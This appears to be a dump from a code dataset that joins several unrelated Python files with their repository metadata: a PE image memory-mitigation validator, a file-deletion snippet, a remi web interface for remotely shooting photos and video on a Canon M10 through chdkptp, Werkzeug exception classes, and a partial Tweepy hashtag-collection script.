elif logical_separator == "AND":
result = True
for reqs in alignments:
result = result and eval(f'{alignment} {reqs["COMPARISON"]} {reqs["VALUE"]}')
elif logical_separator == "OR":
result = False
for reqs in alignments:
result = result or eval(f'{alignment} {reqs["COMPARISON"]} {reqs["VALUE"]}')
else:
logging.error("Invalid logical separator provided")
return Result.FAIL
else:
req = alignments[0]
result = eval(f'{alignment} {req["COMPARISON"]} {req["VALUE"]}')
if result is False:
logging.error(f'[{Result.FAIL}: Section Alignment Required: \
[{target_info["MACHINE_TYPE"]}] \
[{target_info["PROFILE"]}]: \
[(Detected): {alignment}]')
return Result.FAIL
return Result.PASS
class TestSubsystemValue(TestInterface):
"""
Test: Subsystem type verification
Detailed Description:
Checks the subsystem value by accessing the optional header, then
subsystem value. This value must match one of the allowed subsystem
described in the config file
Output:
@Success: Subsystem type found in the optional header matches one of
the allowed subsystems
@Warn : Subsystem type is not found in the optional header
@Skip : No subsystem type restrictions specified
@Fail : Subsystem type found in the optional header does not match
one of the allowed subsystems
Possible Solution:
Update the subsystem type in the source code.
"""
def name(self):
return 'Subsystem type verification'
def execute(self, pe, config_data):
target_requirements = config_data["TARGET_REQUIREMENTS"]
subsystems = target_requirements.get("ALLOWED_SUBSYSTEMS")
if subsystems is None or len(subsystems) == 0:
return Result.SKIP
try:
subsystem = pe.OPTIONAL_HEADER.Subsystem
except:
logging.warn("Section Alignment is not present")
return Result.WARN
if subsystem is None:
logging.warning(f'[{Result.WARN}]: Subsystem type is not present in the optional header.')
return Result.WARN
actual_subsystem = SUBSYSTEM_TYPE.get(subsystem)
if actual_subsystem is None:
logging.error(f'[{Result.WARN}]: Invalid Subsystem present')
return Result.FAIL
if actual_subsystem in subsystems:
return Result.PASS
else:
logging.error(f'{Result.FAIL}: Submodule Type [{actual_subsystem}] not allowed.')
return Result.FAIL
###########################
# TESTS END #
###########################
#
# Command Line Interface configuration
#
def get_cli_args(args):
parser = argparse.ArgumentParser(description='A Image validation tool for memory mitigation')
parser.add_argument('-i', '--file',
type=str,
required=True,
help='path to the image that needs validated.')
parser.add_argument('-d', '--debug',
action='store_true',
default=False)
parser.add_argument('-p', '--profile',
type=str,
default=None,
help='the profile config to be verified against. \
Will use the default, if not provided')
group = parser.add_mutually_exclusive_group()
group.add_argument('--set-nx-compat',
action='store_true',
default=False,
help='sets the NX_COMPAT flag')
group.add_argument('--clear-nx-compat',
action='store_true',
default=False,
help='clears the NX_COMPAT flag')
group.add_argument('--get-nx-compat',
action='store_true',
default=False,
help='returns the value of the NX_COMPAT flag')
return parser.parse_args(args)
def main():
# setup main console as logger
logger = logging.getLogger('')
logger.setLevel(logging.INFO)
console = edk2_logging.setup_console_logging(False)
logger.addHandler(console)
args = get_cli_args(sys.argv[1:])
if args.debug is True:
console.setLevel(logging.DEBUG)
logging.info("Log Started: " + datetime.strftime(
datetime.now(), "%A, %B %d, %Y %I:%M%p"))
# pe.write(filename=f'{basename[0]}_nx_clear.{basename[1]}'
# Set the nx compatability flag and exit
if args.set_nx_compat is not None:
pe = PE(args.file)
set_nx_compat_flag(pe)
os.remove(args.file)
pe.write(args.file)
exit(0)
# clear the nx compatability flag and exit
if args.clear_nx_compat is not None:
pe = PE(args.file)
clear_nx_compat_flag(pe)
os.remove(args.file)
pe.write(args.file)
exit(0)
# exit with status equal to if nx compatability is present or not
if args.get_nx_compat is True:
exit(get_nx_compat_flag(args.file))
test_manager = TestManager()
test_manager.add_test(TestWriteExecuteFlags())
test_manager.add_test(TestSectionAlignment())
test_manager.add_test(TestSubsystemValue())
pe = PE(args.file)
if not args.profile:
result = test_manager.run_tests(pe)
else:
result = test_manager.run_tests(pe, args.profile)
logging.info(f'Overall Result: {result}')
if result == Result.SKIP:
logging.info('No Test requirements in the config file for this file.')
elif result == Result.PASS or result == Result.WARN:
sys.exit(0)
else:
sys.exit(1)
if __name__ == '__main__':
main()
| 34.795752
| 112
| 0.505565
| 16,493
| 0.774501
| 0
| 0
| 0
| 0
| 0
| 0
| 8,707
| 0.408875
|
b19eba8650f17954158c7ab292c05abfa2a4065c
| 44
|
py
|
Python
|
src/basics/files/delete_fichero.py
|
FoxNeo/MyPythonProjects
|
3499ef0853f0087f6f143e1633b0a88a3d7b9818
|
[
"MIT"
] | null | null | null |
src/basics/files/delete_fichero.py
|
FoxNeo/MyPythonProjects
|
3499ef0853f0087f6f143e1633b0a88a3d7b9818
|
[
"MIT"
] | null | null | null |
src/basics/files/delete_fichero.py
|
FoxNeo/MyPythonProjects
|
3499ef0853f0087f6f143e1633b0a88a3d7b9818
|
[
"MIT"
] | null | null | null |
import os
os.remove("fichero_generado.txt")
| 14.666667
| 33
| 0.795455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 22
| 0.5
|
b19fd8f1c6f4a820c1d3db28aa85e5f3c1020cae
| 31,290
|
py
|
Python
|
Canon-M10.py
|
emanuelelaface/Canon-M10
|
bd4559b2e528fbaa9559a92c4e752ce5f96c1053
|
[
"MIT"
] | 3
|
2019-12-06T22:32:31.000Z
|
2022-02-13T00:35:55.000Z
|
Canon-M10.py
|
emanuelelaface/Canon-M10
|
bd4559b2e528fbaa9559a92c4e752ce5f96c1053
|
[
"MIT"
] | null | null | null |
Canon-M10.py
|
emanuelelaface/Canon-M10
|
bd4559b2e528fbaa9559a92c4e752ce5f96c1053
|
[
"MIT"
] | 5
|
2019-12-06T22:32:23.000Z
|
2021-12-26T20:46:56.000Z
|
# -*- coding: utf-8 -*-
from remi.gui import *
from remi import start, App
import cv2
import numpy
import chdkptp
import time
import threading
import rawpy
class OpenCVVideoWidget(Image):
def __init__(self, **kwargs):
super(OpenCVVideoWidget, self).__init__("/%s/get_image_data" % id(self), **kwargs)
self.frame_index = 0
self.frame = numpy.full((480, 720,3),155, dtype=numpy.uint8)
def update(self, app_instance):
self.frame_index = numpy.random.randint(1e8)
app_instance.execute_javascript("""
var url = '/%(id)s/get_image_data?index=%(frame_index)s';
var xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.responseType = 'blob'
xhr.onload = function(e){
urlCreator = window.URL || window.webkitURL;
urlCreator.revokeObjectURL(document.getElementById('%(id)s').src);
imageUrl = urlCreator.createObjectURL(this.response);
document.getElementById('%(id)s').src = imageUrl;
}
xhr.send();
""" % {'id': id(self), 'frame_index':self.frame_index})
def get_image_data(self, index=0):
ret, jpeg = cv2.imencode('.jpeg', self.frame)
if ret:
headers = {'Content-type': 'image/jpeg'}
return [jpeg.tostring(), headers]
return None, None
class M10GUI(App):
def __init__(self, *args, **kwargs):
if not 'editing_mode' in kwargs.keys():
super(M10GUI, self).__init__(*args, static_file_path={'my_res':'./res/'})
self.stop_event = threading.Event()
self.stop_event.clear()
def log_message(self, *args, **kwargs):
pass
def idle(self):
if self.live_view_check.get_value():
vp, bm = self.get_live_view()
self.image.frame = numpy.clip(vp.astype(numpy.uint16)+ bm.astype(numpy.uint16),0,255).astype(numpy.uint8)
self.image.update(self)
if time.time()-self.timer > 10:
try:
self.temperature_label.set_text('Temp (\xb0C): '+str(self.camera.lua_execute('get_temperature(1)')))
self.battery_label.set_text('Batt (V): '+str(self.camera.lua_execute('get_vbatt()')/1000.))
except:
None
self.timer = time.time()
pass
def main(self):
self.timer = time.time()
return M10GUI.construct_ui(self)
def on_close(self):
self.stop_event.set()
super(M10GUI, self).on_close()
@staticmethod
def construct_ui(self):
container = GridBox(width='100%', height='100%', style={'margin':'0px auto', "background-color":"#d5d0c7"})
container.attributes.update({"class":"Widget","editor_constructor":"()","editor_varname":"container","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Widget"})
container.set_from_asciiart("""
| | | | iso_label | shutter_label | pics_label | time_label | live_view_label | zoom_label |
| shoot_button | video_button | stop_button | iso_menu | shutter_value | pics_value | time_value | live_view_check | zoom_menu |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| image | image | image | image | image | image | image | image | image |
| lua_label | lua_label | lua_value | lua_value | lua_value | lua_value | lua_value | lua_value | lua_value |
| status_label | status_label | status_label | status_label | status_label | status_label | temperature_label | battery_label | connect_button |
""", 1, 1)
self.shoot_button = Button('Shoot')
self.shoot_button.set_enabled(False)
self.shoot_button.style.update({"width":"100%","height":"100%"})
self.shoot_button.attributes.update({"class":"Button","editor_constructor":"('Shoot')","editor_varname":"shoot_button","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Button"})
self.shoot_button.onclick.do(self.start_shoot)
self.video_button = Button('Video')
self.video_button.set_enabled(False)
self.video_button.style.update({"width":"100%","height":"100%"})
self.video_button.attributes.update({"class":"Button","editor_constructor":"('Video')","editor_varname":"video_button","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Button"})
self.video_button.onclick.do(self.start_video)
self.stop_button = Button('Stop')
self.stop_button.set_enabled(False)
self.stop_button.style.update({"width":"100%","height":"100%"})
self.stop_button.attributes.update({"class":"Button","editor_constructor":"('Stop')","editor_varname":"stop_button","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Button"})
self.stop_button.onclick.do(self.stop_action)
self.iso_menu = DropDown.new_from_list(('Auto','100','125','160','200','250','320','400', '500','640','800','1000','1250','1600','2000','2500', '3200','4000','5000','6400','8000','10000','12800'))
self.iso_menu.set_enabled(False)
self.iso_menu.set_value('Auto')
self.iso_menu.attributes.update({"class":"DropDown","editor_constructor":"()","editor_varname":"iso_menu","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"DropDown"})
self.iso_menu.onchange.do(self.set_iso)
self.shutter_value = TextInput(True,'')
self.shutter_value.set_enabled(False)
self.shutter_value.attributes.update({"class":"TextInput","autocomplete":"off","editor_constructor":"(False,'')","editor_varname":"shutter_value","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"TextInput"})
self.shutter_value.onchange.do(self.change_shutter)
iso_label = Label('ISO')
iso_label.attributes.update({"class":"Label","editor_constructor":"('ISO')","editor_varname":"iso_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
shutter_label = Label('Shutter')
shutter_label.attributes.update({"class":"Label","editor_constructor":"('Shutter')","editor_varname":"shutter_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.pics_value = TextInput(True,'')
self.pics_value.set_enabled(False)
self.pics_value.attributes.update({"class":"TextInput","autocomplete":"off","editor_constructor":"(False,'')","editor_varname":"pics_value","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"TextInput"})
pics_label = Label('Pics')
pics_label.attributes.update({"class":"Label","editor_constructor":"('Pics')","editor_varname":"pics_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.time_value = TextInput(True,'')
self.time_value.set_enabled(False)
self.time_value.attributes.update({"class":"TextInput","autocomplete":"off","editor_constructor":"(False,'')","editor_varname":"time_value","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"TextInput"})
time_label = Label('Hold')
time_label.attributes.update({"class":"Label","editor_constructor":"('Time')","editor_varname":"time_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.live_view_check = CheckBox(False,'')
self.live_view_check.set_enabled(False)
self.live_view_check.onchange.do(self.toggle_live)
self.live_view_check.attributes.update({"class":"checkbox","value":"","type":"checkbox","autocomplete":"off","editor_constructor":"(False,'')","editor_varname":"live_view_check","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"CheckBox"})
live_view_label = Label('Live')
live_view_label.attributes.update({"class":"Label","editor_constructor":"('Live')","editor_varname":"live_view_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.zoom_menu = DropDown.new_from_list(('1', '5', '10'))
self.zoom_menu.set_enabled(False)
self.zoom_menu.set_value('1')
self.zoom_menu.attributes.update({"class":"DropDown","editor_constructor":"()","editor_varname":"zoom_menu","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"DropDown"})
self.zoom_menu.onchange.do(self.change_zoom)
zoom_label = Label('Zoom')
zoom_label.attributes.update({"class":"Label","editor_constructor":"('Zoom')","editor_varname":"zoom_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.image = OpenCVVideoWidget(width='100%', height='100%')
self.image.attributes.update({"class":"Image","width":"720","height":"480","editor_constructor":"(720,480)","editor_varname":"image","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Image"})
infos_label = Label('Infos')
infos_label.attributes.update({"class":"Label","editor_constructor":"('Infos')","editor_varname":"infos_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.temperature_label = Label('Temp (\xb0C):')
self.temperature_label.attributes.update({"class":"Label","editor_constructor":"('Temp (ºC):')","editor_varname":"temperature_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.battery_label = Label('Batt (V):')
self.battery_label.attributes.update({"class":"Label","editor_constructor":"('Batt (V):')","editor_varname":"battery_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.connect_button = Button('Connect')
self.connect_button.style.update({"width":"100%","height":"100%"})
self.connect_button.attributes.update({"class":"Button","editor_constructor":"('Connect')","editor_varname":"connect_button","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Button"})
self.connect_button.onclick.do(self.init_camera)
lua_label = Label('Lua Execute:')
lua_label.attributes.update({"class":"Label","editor_constructor":"('Lua Execute:')","editor_varname":"lua_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
self.lua_value = TextInput(True,'')
self.lua_value.set_enabled(False)
self.lua_value.attributes.update({"class":"TextInput","autocomplete":"off","editor_constructor":"(False,'')","editor_varname":"lua_value","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"TextInput"})
self.lua_value.onchange.do(self.exec_lua)
self.status_label = Label('Camera not connected')
self.status_label.attributes.update({"class":"Label","editor_constructor":"('')","editor_varname":"status_label","editor_tag_type":"widget","editor_newclass":"False","editor_baseclass":"Label"})
container.append({'shoot_button':self.shoot_button, 'video_button':self.video_button, 'stop_button':self.stop_button, 'iso_menu':self.iso_menu, 'shutter_value':self.shutter_value, 'iso_label':iso_label, 'shutter_label':shutter_label, 'pics_value':self.pics_value, 'pics_label':pics_label, 'time_value':self.time_value, 'time_label':time_label, 'live_view_check':self.live_view_check, 'live_view_label':live_view_label, 'zoom_menu':self.zoom_menu, 'zoom_label':zoom_label, 'image':self.image, 'temperature_label':self.temperature_label, 'battery_label':self.battery_label, 'connect_button':self.connect_button, 'lua_label':lua_label, 'lua_value':self.lua_value, 'status_label':self.status_label})
self.container = container
return self.container
def set_status_label(self, text):
with self.update_lock:
self.status_label.set_text(text)
##### Here the GUI is over and starts the camera
def init_camera(self, widget):
def erase_ok(widget):
try:
device=chdkptp.list_devices()
self.camera=chdkptp.ChdkDevice(device[0])
except:
self.status_label.set_text('Error: camera not connected')
return
self.camera.switch_mode('record')
self.camera.lua_execute('set_backlight(0)')
self.camera.lua_execute('call_event_proc("UI.CreatePublic")')
self.purge_files()
self.status_label.set_text('Camera connected')
self.connect_button.set_enabled(False)
self.iso_menu.set_enabled(True)
self.shutter_value.set_enabled(True)
self.pics_value.set_enabled(True)
self.shoot_button.set_enabled(True)
self.video_button.set_enabled(True)
self.live_view_check.set_enabled(True)
self.lua_value.set_enabled(True)
self.iso_menu.set_value(self.get_iso())
self.shutter_value.set_value(str(self.get_camera_shutter_time()))
self.pics_value.set_value('1')
if self.camera.lua_execute('get_drive_mode()') == 1:
if float(self.shutter_value.get_value()) < 1:
self.time_value.set_enabled(True)
self.time_value.set_value('0')
else:
self.time_value.set_value('0')
self.temperature_label.set_text('Temp (\xb0C): '+str(self.camera.lua_execute('get_temperature(1)')))
self.battery_label.set_text('Batt (V): '+str(self.camera.lua_execute('get_vbatt()')/1000.))
erase_dialog=GenericDialog(title='WARNING',message='All your data on the camera will be erased!')
erase_dialog.style.update({"margin":"0px","width":"500px","height":"100px","top":"10px","left":"10px","position":"absolute","overflow":"auto"})
erase_dialog.show(self)
erase_dialog.confirm_dialog.do(erase_ok)
def toggle_live(self, widget, value):
if self.live_view_check.get_value():
self.zoom_menu.set_enabled(True)
else:
self.zoom_menu.set_enabled(False)
def get_iso(self):
return self.camera.lua_execute('get_iso_mode()')
def set_iso(self, widget, iso):
iso = self.iso_menu.get_value()
if iso == 'Auto':
iso='0'
self.camera.lua_execute('set_iso_mode('+iso+')')
self.camera.lua_execute('press("shoot_half")')
def get_camera_shutter_time(self):
time = self.camera.lua_execute('tv96_to_usec(get_user_tv96())')
if time < 1000000:
return time/1000000.
else:
return time/1000000
def change_shutter(self, widget, value):
try:
time=int(float(self.shutter_value.get_text())*1000000)
except:
self.status_label.set_text('Error: shutter time must be a number')
return
if time > 32000000:
time=32000000
if time < 250:
time=250
self.camera.lua_execute('set_user_tv96(usec_to_tv96('+str(time)+'))\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'return')
self.text_line_message='Done'
def purge_files(self):
for i in self.list_files():
self.camera.delete_files(i)
def list_files(self):
file_list=[]
for i in self.camera.list_files():
if 'CANONMSC' not in i:
file_list+=self.camera.list_files(i[:-1])
return file_list
def change_zoom(self, widget, zoom):
zoom = int(self.zoom_menu.get_value())
if zoom==1:
self.camera.lua_execute('post_levent_to_ui(0x11ea,0)\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'return')
self.iso_menu.set_enabled(True)
self.shutter_value.set_enabled(True)
if zoom==5:
self.camera.lua_execute('post_levent_to_ui(0x11ea,0)\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'return')
self.camera.lua_execute('post_levent_to_ui(0x11ea,1)\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'return')
self.iso_menu.set_enabled(False)
self.shutter_value.set_enabled(False)
if zoom==10:
self.camera.lua_execute('post_levent_to_ui(0x11ea,1)\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'call_event_proc("PTM_SetCurrentItem",0x80b8,2)\n'
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'return')
self.iso_menu.set_enabled(False)
self.shutter_value.set_enabled(False)
def start_shoot(self, widget):
try:
float(self.shutter_value.get_value())
float(self.time_value.get_value())
int(self.pics_value.get_value())
except:
return
self.shoot_button.set_enabled(False)
self.video_button.set_enabled(False)
self.stop_button.set_enabled(True)
self.live_view_check.set_value(False)
self.live_view_check.set_enabled(False)
tr = threading.Thread(target=self.shoot_pic, args=(self.stop_event,))
tr.start()
def start_video(self, widget):
try:
float(self.shutter_value.get_value())
float(self.time_value.get_value())
int(self.pics_value.get_value())
except:
return
if float(self.shutter_value.get_value()) < 1:
self.status_label.set_text('Video length must be at least 1 second')
return
self.shoot_button.set_enabled(False)
self.video_button.set_enabled(False)
self.stop_button.set_enabled(True)
self.live_view_check.set_value(False)
self.live_view_check.set_enabled(False)
tr = threading.Thread(target=self.shoot_video, args=(self.stop_event,))
tr.start()
def shoot_pic(self, stop_event):
record_counter = 0
timer=int(time.time())
shutter_time=str(int(numpy.rint(float(self.shutter_value.get_value())*1000000)))
while record_counter < int(self.pics_value.get_value()) and not stop_event.isSet():
if float(self.shutter_value.get_value()) >= 1 or float(self.time_value.get_value()) == 0:
self.camera.lua_execute('set_tv96_direct(usec_to_tv96('+shutter_time+'))\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'press("shoot_full")\n' \
'return')
else:
self.camera.lua_execute('set_tv96_direct(usec_to_tv96('+shutter_time+'))\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'press("shoot_full")\n' \
'sleep('+str(int(numpy.rint(float(self.time_value.get_value())*1000)))+')\n' \
'release("shoot_full")\n' \
'return')
if float(self.shutter_value.get_value()) <= 1:
self.status_label.set_text('Photo '+str(record_counter+1)+' of '+str(self.pics_value.get_value()))
time.sleep(float(self.shutter_value.get_value()))
else:
seconds=0
while seconds<float(self.shutter_value.get_value()):
if stop_event.isSet():
self.set_status_label('Aborting, waiting '+str(int(float(self.shutter_value.get_value())-seconds))+' seconds for the last photo')
else:
self.set_status_label('Photo '+str(record_counter+1)+' of '+str(self.pics_value.get_value())+' due in '+str(int(float(self.shutter_value.get_value())-seconds))+' seconds')
time.sleep(1)
seconds+=1
self.set_status_label('Downloading photos from the camera')
while len(self.list_files()) == 0:
time.sleep(1)
for i in self.list_files():
localfile=i.split('/')[3]
self.camera.download_file(i,localfile)
if 'JPG' in localfile:
self.image.frame=cv2.resize(cv2.imread(localfile.split('.')[0]+'.JPG'), (720, 480))
else:
raw=rawpy.imread(localfile.split('.')[0]+'.CR2')
self.image.frame=cv2.resize(raw.postprocess(half_size=True, user_flip=False)[...,::-1], (720, 480))
raw.close()
with self.update_lock:
self.image.update(self)
self.purge_files()
record_counter += 1
stop_event.clear()
self.set_status_label('Done')
with self.update_lock:
self.shoot_button.set_enabled(True)
self.video_button.set_enabled(True)
self.stop_button.set_enabled(False)
self.live_view_check.set_enabled(True)
def shoot_video(self, stop_event):
record_counter = 0
while record_counter < int(self.pics_value.get_value()) and not stop_event.isSet():
seconds=0
self.camera.lua_execute('press("video")')
while seconds<float(self.shutter_value.get_value()) and not stop_event.isSet():
self.set_status_label('Video '+str(record_counter+1)+' of '+str(self.pics_value.get_value())+' due in '+str(int(float(self.shutter_value.get_value())-seconds))+' seconds')
time.sleep(1)
seconds+=1
self.camera.lua_execute('press("video")')
self.set_status_label('Downloading video from the camera')
while self.camera.lua_execute('get_movie_status()') != 1:
time.sleep(1)
for i in self.list_files():
localfile=i.split('/')[3]
self.camera.download_file(i,localfile)
self.purge_files()
record_counter += 1
stop_event.clear()
self.set_status_label('Done')
with self.update_lock:
self.shoot_button.set_enabled(True)
self.video_button.set_enabled(True)
self.stop_button.set_enabled(False)
self.live_view_check.set_enabled(True)
def stop_action(self, widget):
self.status_label.set_text('Abotring...')
self.stop_event.set()
def get_live_view(self):
self.camera._lua.eval("""
function()
status, err = con:live_dump_start('/tmp/live_view_frame')
for i=1,1 do
status, err = con:live_get_frame(29)
status, err = con:live_dump_frame()
end
status, err = con:live_dump_end()
return err
end
""")()
lv_aspect_ratio = {0:'LV_ASPECT_4_3', 1:'LV_ASPECT_16_9', 2:'LV_ASPECT_3_2'}
fb_type = {0:12, 1:8, 2:16, 3:16, 4:8 }
file_header_dtype = numpy.dtype([('magic','int32'),('header_size', 'int32'),('version_major', 'int32'),('version_minor','int32')])
frame_length_dtype = numpy.dtype([('length','int32')])
frame_header_dtype = numpy.dtype([('version_major','int32'),('version_minor', 'int32'),('lv_aspect_ratio', 'int32'),
('palette_type','int32'), ('palette_data_start','int32'), ('vp_desc_start','int32'), ('bm_desc_start','int32'),
('bmo_desc_start','int32')])
block_description_dtype = numpy.dtype([('fb_type','int32'),('data_start','int32'),('buffer_width','int32'),
('visible_width','int32'),('visible_height','int32'),('margin_left','int32'), ('margin_top','int32'),
('margin_right','int32'),('margin_bottom','int32')])
myFile = open('/tmp/live_view_frame','r')
file_header=numpy.fromfile(myFile, dtype=file_header_dtype, count=1)
frame_length=numpy.fromfile(myFile, dtype=frame_length_dtype, count=1)
frame_header=numpy.fromfile(myFile, dtype=frame_header_dtype, count=1)
vp_description=numpy.fromfile(myFile, dtype=block_description_dtype, count=1)
vp_bpp = fb_type[int(vp_description['fb_type'])]
vp_frame_size=vp_description['buffer_width']*vp_description['visible_height']*vp_bpp/8 # in byte !
vp_frame_size = int(vp_frame_size[0])
bm_description=numpy.fromfile(myFile, dtype=block_description_dtype, count=1)
bm_bpp = fb_type[int(bm_description['fb_type'])]
bm_frame_size=bm_description['buffer_width']*bm_description['visible_height']*bm_bpp/8
bm_frame_size = int(bm_frame_size[0])
bmo_description=numpy.fromfile(myFile, dtype=block_description_dtype, count=1)
bmo_bpp = fb_type[int(bmo_description['fb_type'])]
bmo_frame_size=bmo_description['buffer_width']*bmo_description['visible_height']*bmo_bpp/8
bmo_frame_size = int(bmo_frame_size[0])
if vp_description['data_start'] > 0:
vp_raw_img=numpy.fromfile(myFile, dtype=numpy.uint8, count=vp_frame_size)
y=vp_raw_img[1::2].reshape(int(vp_description['visible_height']),int(vp_description['buffer_width']))
u=numpy.empty(vp_frame_size//2, dtype=numpy.uint8)
u[0::2]=vp_raw_img[0::4]
u[1::2]=vp_raw_img[0::4]
u=u.reshape(int(vp_description['visible_height']),int(vp_description['buffer_width']))
v=numpy.empty(vp_frame_size//2, dtype=numpy.uint8)
v[0::2]=vp_raw_img[2::4]
v[1::2]=vp_raw_img[2::4]
v=v.reshape(int(vp_description['visible_height']),int(vp_description['buffer_width']))
raw_yuv=numpy.dstack((y,u,v))[:,0:int(vp_description['visible_width']),:]
vp_rgb=cv2.cvtColor(raw_yuv, cv2.COLOR_YUV2BGR)
if bm_description['data_start'] > 0:
bm_raw_img=numpy.fromfile(myFile, dtype=numpy.uint8, count=bm_frame_size)
y=bm_raw_img[1::2].reshape(int(bm_description['visible_height']),int(bm_description['buffer_width']))
u=numpy.empty(bm_frame_size//2, dtype=numpy.uint8)
u[0::2]=bm_raw_img[0::4]
u[1::2]=bm_raw_img[0::4]
u=u.reshape(int(bm_description['visible_height']),int(bm_description['buffer_width']))
v=numpy.empty(bm_frame_size//2, dtype=numpy.uint8)
v[0::2]=bm_raw_img[2::4]
v[1::2]=bm_raw_img[2::4]
v=v.reshape(int(bm_description['visible_height']),int(bm_description['buffer_width']))
raw_yuv=numpy.dstack((y,u,v))[:,0:int(bm_description['visible_width']),:]
bm_rgb=cv2.cvtColor(raw_yuv, cv2.COLOR_YUV2BGR)
if bmo_description['data_start'] >0:
bmo_raw_img=numpy.fromfile(myFile, dtype=numpy.int32, count=bmo_frame_size)
myFile.close()
if vp_rgb.shape[0]==408: # Workaround for video mode
extension=numpy.zeros((480,720,3))
extension[36:444, :, :]=vp_rgb # (480-408)/2:480-(480-408)/2, :, :
vp_rgb=extension
return vp_rgb, bm_rgb
def exec_lua(self, widget, value):
try:
self.camera.lua_execute(str(self.lua_value.get_value())+'\n' \
'press("shoot_half")\n' \
'repeat\n' \
' sleep(10)\n' \
'until get_shooting()\n' \
'return')
self.status_label.set_text('Done')
except:
self.status_label.set_text('Error executing LUA')
if __name__ == "__main__":
start(M10GUI, address='0.0.0.0', port=8081, multiple_instance=False, enable_file_cache=True, start_browser=False, debug=False, update_interval = 0.01)
| 58.376866
| 703
| 0.577245
| 30,947
| 0.989006
| 0
| 0
| 11,213
| 0.358346
| 0
| 0
| 11,244
| 0.359337
|
b1a00da7893518e48125fe8f8ffac5ec512f86f7
| 781
|
py
|
Python
|
server/utils/exception/exception.py
|
mnichangxin/blog-server
|
44544c53542971e4ba31b7d1a58d2a7fe55bfe06
|
[
"MIT"
] | null | null | null |
server/utils/exception/exception.py
|
mnichangxin/blog-server
|
44544c53542971e4ba31b7d1a58d2a7fe55bfe06
|
[
"MIT"
] | null | null | null |
server/utils/exception/exception.py
|
mnichangxin/blog-server
|
44544c53542971e4ba31b7d1a58d2a7fe55bfe06
|
[
"MIT"
] | null | null | null |
from werkzeug.exceptions import HTTPException
class APIException(HTTPException):
def __init__(self, msg='客户端错误', code=400, err_code=900, headers=None):
self.msg = msg
self.code = code
self.err_code = err_code
super(APIException, self).__init__(msg, None)
'''
Custom info return.
'''
# def __repr__(self):
# return '<APIException>: {}--{}'.format(self.code, self.msg)
# def __str__(self):
# return '<APIException>: {}--{}'.format(self.code, self.msg)
class ServerException(APIException):
def __init__(self, msg='服务端错误', code=500, err_code=999):
self.msg = msg
self.code = code
self.err_code = err_code
super(ServerException, self).__init__(msg, code, err_code, None)
| 32.541667
| 74
| 0.627401
| 752
| 0.938826
| 0
| 0
| 0
| 0
| 0
| 0
| 240
| 0.299625
|
b1a21975ae4f7b1e5e6eec59130eae251c21b5f0
| 2,159
|
py
|
Python
|
backend/fetch_tweet.py
|
phuens/Tweet_Analysis
|
8d5fca79107bd4af5278a4530ea1131482f49b42
|
[
"MIT"
] | null | null | null |
backend/fetch_tweet.py
|
phuens/Tweet_Analysis
|
8d5fca79107bd4af5278a4530ea1131482f49b42
|
[
"MIT"
] | null | null | null |
backend/fetch_tweet.py
|
phuens/Tweet_Analysis
|
8d5fca79107bd4af5278a4530ea1131482f49b42
|
[
"MIT"
] | null | null | null |
import json
import csv
import tweepy
from textblob import TextBlob
import nltk
from nltk.tokenize import word_tokenize
def search_for_hashtags(consumer_key, consumer_secret, access_token, access_token_secret, hashtag_phrase):
# create authentication for accessing Twitter
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
# initialize Tweepy API
api = tweepy.API(auth)
# get the name of the spreadsheet we will write to
fname = "data"
string = " "
# open the spreadsheet we will write to
with open('%s.csv' % fname, 'w') as file:
w = csv.writer(file)
# write header row to spreadsheet
w.writerow(['timestamp', 'tweet_text', 'username',
'all_hashtags', 'followers_count', 'location'])
# for each tweet matching our hash tags, write relevant info to the spreadsheet
i = 1
for tweet in tweepy.Cursor(api.search, q=hashtag_phrase + ' -filter:retweets',
lang="en", tweet_mode='extended').items(5000):
string = string + tweet.full_text.replace('\n', ' ')
